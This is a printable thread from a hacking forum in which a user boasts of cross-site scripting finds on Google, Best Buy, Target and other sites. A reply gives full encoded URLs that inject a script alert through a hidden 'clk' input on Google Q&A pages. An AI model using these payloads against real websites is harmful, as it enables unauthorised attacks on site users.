![]() |
|
[Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking) +--- Thread: [Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's (/Thread-Google-Oakley-Logitech-Jcrew-Target-Bestbuy-Hulu-Some-XSS-Find-s) |
[Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's - {Pi} - 03-22-2012 To get myself started here, here are some XSS's I have found in the past few weeks or so. Google.com IT HAS BEEN FIXED Here is a screenshot of the XSS. Spoiler:![]() Email they sent me; Spoiler: Oakley.com Spoiler:![]() Hulu.com Spoiler: Screenshot![]() BestBuy.com Spoiler:![]() Logitech.com Spoiler:![]() Target.com Spoiler:![]() Jcrew.com Spoiler:![]() PM me if you want more information. RE: [Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's - 1234hotmaster - 03-22-2012 1) goes to google 2) Changes url to javascript:void(alert('xss')); 3) Press enter 4) Take screenshot RE: [Google, Oakley, Logitech, Jcrew, Target, Bestbuy, Hulu]Some XSS Find's - {Pi} - 03-23-2012 (03-22-2012, 11:55 PM)1234hotmaster Wrote: 1) goes to googleYou're fucking dumb. The following locations were vulnerable; http://www.google.com/baraza/en http://www.ejabat.google.com http://www.guru.google.co.th All of them are some sort of Q&A system. The pages that were vulnerable on each of them were; Ask *.com/ask? Ask an Admin *.com/aask? The query that I used were; Code: ?subject=Subject&clk=Tes"/><script>alert('PiHF')</script>&pli=1The input that was vulnerable was called clk. It was a hidden input. Here is what it looked like in the source; Code: <input type="hidden" name=clk value=Tes"><script>alert("PiHF")</script>This worked on; http://www.google.com/baraza/en Ask an Admin: Code: http://www.google.com/baraza/en/aask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1Ask Code: http://www.google.com/baraza/en/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1http://www.ejabat.google.com Ask an Admin: Code: http://www.ejabat.google.com/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&pli=1Code: ejabat.google.com/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&http://www.guru.google.co.th Ask: Code: http://www.guru.google.co.th/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&Ask an Admin: Code: http://www.guru.google.co.th/ask?subject=Subject&clk=Tes%22/%3E%3Cscript%3Ealert%28%27PiHF%27%29%3C/script%3E&What further proof do you want? |